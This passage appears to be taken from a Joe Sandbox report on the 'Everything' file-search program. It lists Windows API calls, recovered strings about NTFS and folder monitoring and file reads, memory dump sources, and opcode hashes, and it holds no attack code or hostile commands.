                                                                                                              • Part of subcall function 00007FF63D5489E0: WaitForSingleObject.KERNEL32(?,?,?,00007FF63D480C6E), ref: 00007FF63D5489ED
                                                                                                              • Part of subcall function 00007FF63D5489E0: EnterCriticalSection.KERNEL32(?,?,?,00007FF63D480C6E), ref: 00007FF63D548A03
                                                                                                            • SetEvent.KERNEL32 ref: 00007FF63D4BDB81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Enter$Leave$EventObjectSingleWait
                                                                                                            • String ID: resume ntfs monitor %d
                                                                                                            • API String ID: 3210851982-1436612856
                                                                                                            • Opcode ID: 14a05e452d1075a6521d7e6656662921210bd9c0d285e9ab8549614146580361
                                                                                                            • Instruction ID: 06c8011f104df769c9b00adef6ac905b36d3ffcc10c0e867234039d07ab198dd
                                                                                                            • Opcode Fuzzy Hash: 14a05e452d1075a6521d7e6656662921210bd9c0d285e9ab8549614146580361
                                                                                                            • Instruction Fuzzy Hash: 83415E36508B8682D750CF61E4406AD7365FB84BA8F180231DFAE87B99DF38D465DB40
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$CountEnterLeaveTick$Event
                                                                                                            • String ID:
                                                                                                            • API String ID: 1784581420-0
                                                                                                            • Opcode ID: 2e96373affcaed00a7f781a60d025cf9f52ebf7412d5493434d6f9274cf9b190
                                                                                                            • Instruction ID: 354739bf1a44d64d8ab2376d4e7b33bbe148b2d8d29b4461d205c35386c8b814
                                                                                                            • Opcode Fuzzy Hash: 2e96373affcaed00a7f781a60d025cf9f52ebf7412d5493434d6f9274cf9b190
                                                                                                            • Instruction Fuzzy Hash: AD215B21A55B8AC6EB988FA1D4443B97760FF85B88F080031CB5D83356EF3DD4A4E780
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$DeleteEnterLeaveObject$InitializeMessagePostSingleTimerWait
                                                                                                            • String ID: READ DIRECTORY CHANGE UPDATE %d %s$db_monitor_folder_read_directory_changes_update
                                                                                                            • API String ID: 1224524647-3124906219
                                                                                                            • Opcode ID: bee86497297dabc08b638fa8638a10b713a7bb8a7786b7e6be4d6315837b6027
                                                                                                            • Instruction ID: 5cc5c3b2594962040cb073d523c0ebde9a01b06a8bcf0a166236eb65465f824e
                                                                                                            • Opcode Fuzzy Hash: bee86497297dabc08b638fa8638a10b713a7bb8a7786b7e6be4d6315837b6027
                                                                                                            • Instruction Fuzzy Hash: 4CA15F76A08B8A92EA698FA1D5402BD7365FB54B84F444436DBDD83B96EF3CE070D340
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID: BZ2_bzDecompress(): %d: Failed to decompress.$BZ2_bzDecompress(): %d: Unexpected EOF in decompression stream.$ReadFile(): %d: Failed to read.
                                                                                                            • API String ID: 2738559852-2845142729
                                                                                                            • Opcode ID: 1dfd9de8a8a75b2ad6e5a080edde2225a4af8c8e7a7afe080d0f42863835be76
                                                                                                            • Instruction ID: 2a84ae0758b8b3a125e083ff7e3cb676c2673ad1f99544b6cb00f528fc51d1ea
                                                                                                            • Opcode Fuzzy Hash: 1dfd9de8a8a75b2ad6e5a080edde2225a4af8c8e7a7afe080d0f42863835be76
                                                                                                            • Instruction Fuzzy Hash: 76418036A0865A87EB208BA2F04003AB3A1FB85794F154135DBAE83B95EF3CE455E700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$ControlDeviceFileRead
                                                                                                            • String ID: failed to get refs drive geometry %u$refs sector size %d
                                                                                                            • API String ID: 360950537-3604407591
                                                                                                            • Opcode ID: ca0e78d4f49f171892ca3ac016261476ce616422ba98fcc02ab5b7fa7f811e0b
                                                                                                            • Instruction ID: d86a9af94bd408177011a0130b5b900fad01e9028ab77a445b3f3eefce2ecd14
                                                                                                            • Opcode Fuzzy Hash: ca0e78d4f49f171892ca3ac016261476ce616422ba98fcc02ab5b7fa7f811e0b
                                                                                                            • Instruction Fuzzy Hash: 2211A021F18A0A85F7108FA1F48836E63A1AF55B94F544034DA2DC7B55EF3DD889AB40
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D54F550: CreateFileW.KERNEL32 ref: 00007FF63D54F5D4
                                                                                                              • Part of subcall function 00007FF63D54F550: DeviceIoControl.KERNEL32 ref: 00007FF63D54F63D
                                                                                                              • Part of subcall function 00007FF63D54F550: GetLastError.KERNEL32 ref: 00007FF63D54F647
                                                                                                              • Part of subcall function 00007FF63D54F550: CloseHandle.KERNEL32 ref: 00007FF63D54F669
                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF63D523A38,?,?,?,00007FF63D4BBE68), ref: 00007FF63D5238DA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                            • String ID: access denied %s$failed to open volume %s %d$open service volume %s
                                                                                                            • API String ID: 1177325624-2793358219
                                                                                                            • Opcode ID: d861ce8b6750cd27805295f67c78406c996c120b65c9277477e4be6b095e0fca
                                                                                                            • Instruction ID: 63ab26f2461a613e3a759e3dd960f7f91f07a429bd84b3222b09a11ed16e4d72
                                                                                                            • Opcode Fuzzy Hash: d861ce8b6750cd27805295f67c78406c996c120b65c9277477e4be6b095e0fca
                                                                                                            • Instruction Fuzzy Hash: AC31A132E18A5A81FB408F62E4403696260EB59BB8F485235EF6D87BC9EF3CD4959700
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00007FF63D61AE59,?,?,?,?,00007FF63D61AAFE), ref: 00007FF63D61A2BA
                                                                                                            • FlsGetValue.KERNEL32(?,?,00000000,00007FF63D61AE59,?,?,?,?,00007FF63D61AAFE), ref: 00007FF63D61A2C8
                                                                                                            • SetLastError.KERNEL32(?,?,00000000,00007FF63D61AE59,?,?,?,?,00007FF63D61AAFE), ref: 00007FF63D61A323
                                                                                                              • Part of subcall function 00007FF63D61AF80: Sleep.KERNEL32(?,?,00000000,00007FF63D619655), ref: 00007FF63D61AFD0
                                                                                                            • FlsSetValue.KERNEL32(?,?,00000000,00007FF63D61AE59,?,?,?,?,00007FF63D61AAFE), ref: 00007FF63D61A2F4
                                                                                                              • Part of subcall function 00007FF63D61A120: GetModuleHandleA.KERNEL32(?,00000000,00000000,00007FF63D61A308,?,?,00000000,00007FF63D61AE59,?,?,?,?,00007FF63D61AAFE), ref: 00007FF63D61A146
                                                                                                              • Part of subcall function 00007FF63D61A120: GetModuleHandleA.KERNEL32 ref: 00007FF63D61A189
                                                                                                              • Part of subcall function 00007FF63D61A120: GetProcAddress.KERNEL32 ref: 00007FF63D61A1D8
                                                                                                              • Part of subcall function 00007FF63D61A120: GetProcAddress.KERNEL32 ref: 00007FF63D61A1F0
                                                                                                              • Part of subcall function 00007FF63D61A120: _lock.LIBCMT ref: 00007FF63D61A238
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00007FF63D61A308
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProcValue$CurrentSleepThread_lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 571222345-0
                                                                                                            • Opcode ID: 5962a07ccfacfd71a62c5081c9f11694e3bc4dc950d308ff11f37d3ef2ab9c95
                                                                                                            • Instruction ID: dc85c448bec7bf969a56a5c7e298686b0995c532616613c516052ee8c493713d
                                                                                                            • Opcode Fuzzy Hash: 5962a07ccfacfd71a62c5081c9f11694e3bc4dc950d308ff11f37d3ef2ab9c95
                                                                                                            • Instruction Fuzzy Hash: 23017134E0971A86FB449FF2A84413922A1BF8AB64F088234D93DC73D1FE3CE805B610
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Event$Source$AllocDeregisterErrorExitLastProcessRegisterReportVirtual
                                                                                                            • String ID: .\src\mem.c$mem_virtual_alloc$out of memory, size: %p, error: %u
                                                                                                            • API String ID: 21386849-1700956700
                                                                                                            • Opcode ID: eb4af7a54668e8aac7753c0dfa1a311765016293ed6c9a0a84dda79b76393e6d
                                                                                                            • Instruction ID: cbc954e30835d48cc7d8ac28611204da37cb564097800277a83f7bf46a386bb7
                                                                                                            • Opcode Fuzzy Hash: eb4af7a54668e8aac7753c0dfa1a311765016293ed6c9a0a84dda79b76393e6d
                                                                                                            • Instruction Fuzzy Hash: 23E0A960E1961F82FB104BA0B8056B9A320AB59789F44023ADD6D827A5EE3CD25AA700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$FileSystem
                                                                                                            • String ID: gfff
                                                                                                            • API String ID: 2086374402-1553575800
                                                                                                            • Opcode ID: ded18b9f583fb34fa0458bf46ef20d1a5aff3ddb30c4462c599d377dd050ac7b
                                                                                                            • Instruction ID: 7237f7b81125f1c3f59abdaeae0a80a623354faa3cfd7404f6a7a0504ccd56f9
                                                                                                            • Opcode Fuzzy Hash: ded18b9f583fb34fa0458bf46ef20d1a5aff3ddb30c4462c599d377dd050ac7b
                                                                                                            • Instruction Fuzzy Hash: FFD17C868980AB06FB351B9490663F627A3DF513B1FC40033DAC9CA3D6ED1CE546E325
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateFile
                                                                                                            • String ID: CreateFileW(): %d: Failed to open file %s
                                                                                                            • API String ID: 1722934493-646564424
                                                                                                            • Opcode ID: 7b5a38d0e03ddd6c7b956e92fb76084c69ea077e5f11d7ebd8688186082e4d6a
                                                                                                            • Instruction ID: 8aa76de978455d60ed69197c805989afd19115e6a60485cf9fa4d89f16a873ee
                                                                                                            • Opcode Fuzzy Hash: 7b5a38d0e03ddd6c7b956e92fb76084c69ea077e5f11d7ebd8688186082e4d6a
                                                                                                            • Instruction Fuzzy Hash: 4711C422E0869986EB109FA0F4557AA6320AFC57A4F540231EE2D83BD5EE3CD404A700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCountCriticalEnterEventHandleObjectSectionSingleTickWait
                                                                                                            • String ID: stop folder monitor %s %p
                                                                                                            • API String ID: 1053278300-1255183386
                                                                                                            • Opcode ID: c1215e91a7269c91251ea8891c7d4cabfde7b6494fe1e95529f800101c2f3329
                                                                                                            • Instruction ID: 125042db1fd56d9ef0d917fdf446d31e6e47aaf41a2621ea2042a7d17d4f2513
                                                                                                            • Opcode Fuzzy Hash: c1215e91a7269c91251ea8891c7d4cabfde7b6494fe1e95529f800101c2f3329
                                                                                                            • Instruction Fuzzy Hash: 7B219F32909F8585E7409FA1E8403A973A1FBD8BA8F184132DE9D87795EF39D0A5D310
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D53F700: GetProcessHeap.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F709
                                                                                                              • Part of subcall function 00007FF63D53F700: HeapAlloc.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F717
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524149
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524158
                                                                                                            • SetLastError.KERNEL32 ref: 00007FF63D5597A6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
